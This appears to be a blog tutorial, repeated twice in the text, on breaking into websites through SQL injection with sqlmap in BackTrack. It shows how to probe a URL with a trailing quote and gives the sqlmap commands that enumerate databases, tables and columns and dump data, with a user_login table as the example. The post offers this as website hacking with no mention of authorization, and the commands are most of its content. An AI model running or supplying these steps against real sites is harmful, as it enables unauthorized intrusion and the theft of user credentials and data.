Hack Website by SQL Vulnerable Website using sqlmap in BackTrack
Suppose the target website is www.target.com/image.php?id=5 for checking for the vulnerability of the website just add ' at the end.. like this
www.target.com/XXXX.php?id=X' then press Enter.
If an Error page appear or some contents are missing then the website is vulnerable .
Now start Sqlmap in BackTrack. Now Enter following commands in terminal.
python ./sqlmap.py -u www.target.com/XXXX.php?id=X --dbs
Now You will get all the db's of this website.
Now To Fetch the tables of the db you want type following commands
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name --tables
this will give u the tables name (instead of Database name enter the name of db you got from first command) .... now chose the Table name carefully...... then
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name -T tablename --columns
this will give u the names of all the columns present in that table.
Now chose column name then
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name -T tablename -C column name --dump
thats it you have dumped the data.
For example:- Suppose the Database name is user_db and Table name is user_login and column name is User_name so the command will be
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D user_db -T user_login -C User_name --dump
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
www.target.com/XXXX.php?id=X' then press Enter.
If an Error page appear or some contents are missing then the website is vulnerable .
Now start Sqlmap in BackTrack. Now Enter following commands in terminal.
python ./sqlmap.py -u www.target.com/XXXX.php?id=X --dbs
Now You will get all the db's of this website.
Now To Fetch the tables of the db you want type following commands
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name --tables
this will give u the tables name (instead of Database name enter the name of db you got from first command) .... now chose the Table name carefully...... then
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name -T tablename --columns
this will give u the names of all the columns present in that table.
Now chose column name then
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D Database name -T tablename -C column name --dump
thats it you have dumped the data.
For example:- Suppose the Database name is user_db and Table name is user_login and column name is User_name so the command will be
python ./sqlmap.py -u www.target.com/XXXX.php?id=X -D user_db -T user_login -C User_name --dump
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
Comments
Post a Comment